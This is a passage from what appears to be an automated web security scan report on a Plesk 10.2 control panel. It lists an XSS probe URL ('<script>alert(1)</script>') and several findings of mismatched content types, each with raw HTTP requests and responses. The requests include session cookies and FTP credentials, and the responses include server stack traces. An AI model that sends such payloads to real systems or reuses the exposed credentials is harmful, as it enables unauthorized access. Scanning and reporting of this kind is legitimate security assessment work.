Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 May 2011 01:42:27 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=d2f17440e69c73361dcc188944327624; path=/
X-Powered-By: ASP.NET
Date: Tue, 24 May 2011 01:42:27 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.16. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E

Request

GET /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:36:58 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=08ef70ae21325bdf1d3e7d74b0164348; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:36:57 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

13. Content type incorrectly stated  previous
There are 7 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


13.1. http://vulnerable.plesk.control.panel.20110407.20:8880/javascript/chk.js.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /javascript/chk.js.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/chk.js.php?1302230642 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&file=/httpdocs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Content-Type: text/html
ETag: "1306174954-17161f28b87a6960fb097d11330c9c53-en-US"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:34 GMT
Connection: close
Content-Length: 8894

function chk_quotes(str)
{
   re = /(\'.*\")|(\".*\')/;
   return str.search(re) == -1;
}


function chk_pd_name(dir)
{
   re = /^[0-9a-zA-Z\-_.\/~@!\+=\^\(\)\[\]\{\}, ]+$/;
   // forbid // and ^. and /. and .$ and ./
   re1 = /(\/\/|^\.|\.$|\/\.|\.\/|\/ | \/)/;
   return (dir.search(re) != -1) && (dir.search(re1) == -1);
}

function chk_db_name(db)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9-_]{0,63}$/;
   return db.search(re) != -1;
}

function chk_db_usr_name(usr, type)
{
   if (type == 'mssql')
       re = /^[a-zA-Z]{1}[A-Za-z0-9_\-]{0,127}$/;
   else
       re = /^[a-zA-Z]{1}[A-Za-z0-9_\-]{0,15}$/;
   return usr.search(re) != -1;
}

function chk_pos_int(pos_int)
{
   re = /^\s*[1-9]{1}[0-9]*\s*$/;
   return pos_int.search(re) != -1;
}

function chk_sys_login(nm)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9_.-]{0,14}$/;
   return nm.search(re) != -1;
}

function chk_mn(mail_name)
{
   re = /^([A-Za-z0-9_\-])+((\.){1}([A-Za-z0-9_\-])+)*$/;
   return mail_name.search(re) != -1;
}

function chk_resp_name(resp_name)
{
   return ((resp_name.length > 0) && (resp_name.length <= 245));
}

function chk_login(login)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9_.-]{0,254}$/;
   return login.search(re) != -1;
}

function chk_realm(realm)
{
   re = /^[^\"]*$/;
   return realm.search(re) != -1;
}

function chk_dom(dom_name)
{
   if ('' == dom_name)
       return false; // check empty value

   if ('localhost.rev' == dom_name)
       return false;

   inaddr = /\.in-addr.arpa$/;
   if (dom_name.search(inaddr) != -1)
       return false;

   if (chk_ip(dom_name))    // no domain name like IP address
       return false;

   dotd = /\.d$/;
   if (dom_name.search(dotd) != -1)
       return false;

   return true; // IDN support
   /*
   nore = /\.$/;
   re = /^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9]){0,1}(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9]){0,1}){1,}$/;

   return (dom_name.search(nore) == -1) && dom_name.match(re);
   */
}

function chk_subdom(dom_name)
{
   return true; // IDN support
   /*
   re = /^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*$/;
   return dom_name.search(re) != -1;
   */
}

function chk_email(email)
{
   re = /^([^\@]+){1}\@([^\@]+){1}$/;
   found = email.match(re);
   if (!found)
       return false;
   return chk_mn(found[1]) && chk_dom(found[2]);
}

function chk_url(url)
{
   re = /^((http[s]?|ftp):\/\/)?([^\/:]+)(:\d{1,5})?(\/[^\s\"\'`]*)?$/i;
   found = re.exec(url);
   if (!found)
       return false;

   return chk_dom(found[3]);
}

function chk_ip(ip)
{
   return chk_ip_address_and_mask(ip, 4, 8);
}

function chk_dom_t(hst)
{
re = /^((<domain>|[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*)(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*|\.<domain>)+|<domain>)$/;
return hst.match(re);
}

function chk_ip_t(ip)
{
   re = /^<ip>$/;
   return chk_ip(ip) || ip.match(re);
}

function chk_mask(mask)
{
   re = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;
   found = mask.match(re);
   if (!found)
       return false;
   var i = found.length - 1;
   while (i && (found[i] == 0)) i--;
   if (!i)
       return true;
   if (
       (found[i] != 128) &&
       (found[i] != 192) &&
       (found[i] != 224) &&
       (found[i] != 240) &&
       (found[i] != 248) &&
       (found[i] != 252) &&
       (found[i] != 254) &&
       (found[i] != 255)
   )
       return false;
   i--;
   while (i && (found[i] == 255)) i--;

   return i == 0;
}

function ip2long(str)
{
   var num = 0;
   var re = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

   found = str.match(re);
   if (!found)
       return null;
   for (var i = 0; ++i < found.length; ) {
       num <<= 8;
       num |= found[i];
   }
   return num;
}

// convert ip block mask to int32 mask
function block_to_num(block)
{
   num = 0;
   for (var i = 0; i < 32; i++) {
       num <<= 1;
       num |= (block > i ? 1 : 0);
   }
   return num;
}

// check ip address and mask by valid rules
function chk_ip_address_and_mask(ip, valid, valid_formats)
{
   var ip_address_mask_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.\*|)|\.\*\.\*|\.\*|)|\.\*\.\*\.\*|\.\*\.\*|\.\*|)()$/;
   var ip_address_block_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})|)|)|)\/(\d{1,2})$/;
   var ip_address_netmask_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})|)|)|)\/(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;
   var ip_address_format = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

   if (!valid)
       valid = 7;
   if (!valid_formats)
       valid_formats = 15;

   var found;
   var ip_address = null;
   var ip_mask = null;

   if (
       (valid_formats & 1) &&
       (found = ip.match(ip_address_mask_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 255)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255))
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = ip2long((found[1] ? 255 : 0) + '.' + (found[3] ? 255 : 0) + '.' + (found[5] ? 255 : 0) + '.' + (found[7] ? 255 : 0));
   } else if (
       (valid_formats & 2) &&
       (found = ip.match(ip_address_block_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 255)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255)) &&
       (found[8] >= 0 && found[8] <= 32)
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = block_to_num(found[8]);
   } else if (
       (valid_formats & 4) &&
       (found = ip.match(ip_address_netmask_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 223)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255)) &&
       (found[8] >= 0 && found[8] <= 255) &&
       (found[9] >= 0 && found[9] <= 255) &&
       (found[10] >= 0 && found[10] <= 255) &&
       (found[11] >= 0 && found[11] <= 255)
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = ip2long(found[8] + '.' + found[9] + '.' + found[10] + '.' + found[11]);
   } else if (
       (valid_formats & 8) &&
       (found = ip.match(ip_address_format)) &&
       (found[1] >= 0 && found[1] <= 255) &&
       (found[2] >= 0 && found[2] <= 255) &&
       (found[3] >= 0 && found[3] <= 255) &&
       (found[4] >= 0 && found[4] <= 255)
   ) {
       ip_address = ip2long(found[1] + '.' + found[2] + '.' + found[3] + '.' + found[4]);
       ip_mask = block_to_num(32);
   }

   if (null == ip_address || null == ip_mask)
       return false;

   return ((valid & 1) && //network block
               ((ip_address & ip_mask) == ip_address)
       ) ||
       ((valid & 2) && // ip address with netmask
           ip_address && ip_mask &&
               (
                   ((ip_address & ~ip_mask) && // and not empty lower bits
                   ~((ip_address & ~ip_mask) | ip_mask) // minimum network size 'may be removed - bcause added single addres networks by client request ...
               ) || (ip_mask == block_to_num(32))
           ) // or single ip address
       ) ||
       ((valid & 4) && //sigle ip address
           ip_address && (ip_mask == block_to_num(32)) // not empty ip address and 0xFFFFFFFF ip mask
       );
}

function chk_ip_mask(ip, mask)
{
   if (!chk_ip(ip) || !chk_mask(mask))
       return false;

   var num_ip;
   var num_mask;

   if ((num_ip = ip2long(ip)) == null)
       return false;

   if ((num_mask = ip2long(mask)) == null)
       return false;

   // check ip/mask combination for interface:
   // 1) mask not null
   // 2) host part not null (num_ip & ~num_mask)
   // 3) host part not all 1 ~((num_ip & ~num_mask) | num_mask)
   return num_mask && (((num_ip & ~num_mask) && ~((num_ip & ~num_mask) | num_mask)) || (mask == '255.255.255.255'));
}

function chk_net_mask(net, mask)
{
   if (!chk_ip(net) || !chk_mask(mask))
       return false;

   var num_net;
   var num_mask;

   if ((num_net = ip2long(net)) == null)
       return false;

   if ((num_mask = ip2long(mask)) == null)
       return false;

   return num_mask && (num_net & num_mask) && ((num_net & num_mask) == num_net);
}

function chk_sys_passwd(username, passwd)
{
   if ((passwd.length < 4) || (passwd.length > 255))
       return false;

   if (passwd.length >= username.length) {
       if (passwd.indexOf(username, 0) != -1)
           return false;
   }

   if ((passwd.indexOf('\'') != -1) || (passwd.indexOf(' ') != -1))
       return false;

   for (var i = passwd.length; i-- > 0;) {
       if (passwd.charCodeAt(i) > 127)
           return false;
   }

   return true;
}

function chk_filename(filename)
{
   re = /^[^\']*$/;
   return filename.search(re) != -1;

}

function chk_uint(uint)
{
   re = /^[0-9]+$/;
   found = uint.match(re);
   if (!found) {
       return false;
   }

   return true;
}

13.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /plesk/client@2/domain@1/hosting/file-manager/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:09:05 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:09:05 GMT
Connection: close
Content-Length: 558

ERROR: PleskException
FileList::init() failed: ls_files_wrapper() failed: Unable to connect to pipe \\.\pipe\PSA_pipe {110D2F0F-F073-4021-AB73-C7886FB9BD1E}

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI:

0: FileManagerUIPointer.php:726
   FileManagerUIPointer->accessItem(string 'GET', NULL null)
1: client.domain.hosting.file-manager.php:87
   plesk__client__domain__hosting__file_manager->accessItem(string 'GET', NULL null)
2: UIPointer.php:600
   UIPointer->access(string 'GET')
3: plesk.php:47

13.3. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/admin-home/disable-featured-applications-promo  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/admin-home/disable-featured-applications-promo

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /smb/admin-home/disable-featured-applications-promo HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; no_frames=deleted; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:34 GMT
Connection: close
Content-Length: 2

[]

13.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/admin-home/featured-applications/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/admin-home/featured-applications/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /smb/admin-home/featured-applications/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/admin-home
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:59:07 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:59:06 GMT
Connection: close
Content-Length: 156

ERROR: PleskFatalException
wrong id

0: UserClient.php:23
   UserClient->__construct(NULL null)
1: class.Session.php:227
   Session->getUser()
2: auth.php3:296

13.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/categories-data/catalogId/apscatalog  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/app/categories-data/catalogId/apscatalog

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /smb/app/categories-data/catalogId/apscatalog HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/app/available/id/apscatalog
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:24:11 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:24:10 GMT
Connection: close
Content-Length: 3763

<ul class="aps-category-list"> <li class="ac-web">
<div class="aps-category-block">
<h4><a href="#" onclick='apsCatalog.showCategory("Web");'>Web</a>
<span>(86)</span> </h4>
<div class="aps-category-items">
<a href="#" onclick='apsCatalog.showCategory("Web/Analytics");' >
Analytics</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Blog");' >
Blog</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Catalog");' >
Catalog</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Content management");' >
Content management</a>, <a href="#" onclick='apsCatalog.showCategory("Web/E-commerce");' >
E-commerce</a>, <a href="#" onclick='apsCatalog.showCategory("Web/eLearning");' >
eLearning</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Forum");' >
Forum</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Gallery");' >
Gallery</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Search");' >
Search</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Tools");' >
Tools</a> </div>
</div>
</li>
<li class="ac-collaboration">
<div class="aps-category-block">
<h4><a href="#" onclick='apsCatalog.showCategory("Collaboration");'>Collaboration</a>
<span>(39)</span> </h4>
<div class="aps-category-items">
<a href="#" onclick='apsCatalog.showCategory("Collaboration/Calendaring");' >
Calendaring</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Chat");' >
Chat</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Email");' >
E-mail</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/IP telephony");' >
IP telephony</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Portal");' >
Portal</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Project management");' >
Project management</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Web conferencing");' >
Web conferencing</a> </div>
</div>
</li>
<li class="ac-front-office">
<div class="aps-category-block">
<h4><a href="#" onclick='apsCatalog.showCategory("Front office");'>Front office</a>
<span>(14)</span> </h4>
<div class="aps-category-items">
<a href="#" onclick='apsCatalog.showCategory("Front office/Help Desk");' >
Help desk</a>, <a href="#" onclick='apsCatalog.showCategory("Front office/Productivity");' >
Productivity</a>, <a href="#" onclick='apsCatalog.showCategory("Front office/Survey Solutions");' >
Survey solutions</a> </div>
</div>
</li>
<li class="ac-back-office">
<div class="aps-category-block">
<h4><a href="#" onclick='apsCatalog.showCategory("Back office");'>Back office</a>
<span>(8)</span> </h4>
<div class="aps-category-items">
<a href="#" onclick='apsCatalog.showCategory("Back office/Accounting and Financial");' >
Accounting and Financial</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Asset Management");' >
Asset management</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Billing");' >
Billing</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Compliance and Risk Management");' >
Compliance and Risk Management</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Customer Relationship Management");' >
Customer relationship management</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Enterprise Resource Planning");' >
Enterprise resource planning</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Knowledge Management");' >
Knowledge management</a> </div>
</div>
</li>
</ul>

13.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/2  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/edit/id/2

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /smb/email-address/edit/id/2 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/edit/id/2
Origin: http://www.nosedivesailing.com:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard
Content-Length: 862

general%5BgeneralSection%5D%5Bname%5D=fdf080d9224fd0d18957a62c&general%5BgeneralSection%5D%5Bpostbox%5D=0&general%5BgeneralSection%5D%5Bpostbox%5D=1&general%5BgeneralSection%5D%5BmboxQuotaValue%5D=1047527424&general-generalSection-mboxQuotaValue-selector=specific&redirect%5BredirectSection%5D%5Benabled%5D=0&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5Bc632267%5D%5BaliasName%5D=&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5BdynamicSubFormTemplate%5D%5BaliasName%5D=&autoResponder%5BautoResponderSection%5D%5Benabled%5D=0&autoResponder%5BautoResponderSection%5D%5BcontentType%5D=false&autoResponder%5BautoResponderSection%5D%5BforwardAddress%5D=&autoResponder%5BautoResponderSection%5D%5Battachments%5D%5BdynamicSubFormTemplate%5D%5Bfile%5D=&antivirus%5BantivirusSection%5D%5Benabled%5D=0&hidden=&forgery_protection_token=3e86204e9517123c7f585d736d64aa3f&_=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:38:02 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:38:01 GMT
Connection: close
Content-Length: 156

ERROR: PleskFatalException
wrong id

0: UserClient.php:23
   UserClient->__construct(NULL null)
1: class.Session.php:227
   Session->getUser()
2: auth.php3:296

13.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/4

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /smb/user/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/edit/id/4
Origin: http://www.nosedivesailing.com:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard
Content-Length: 786

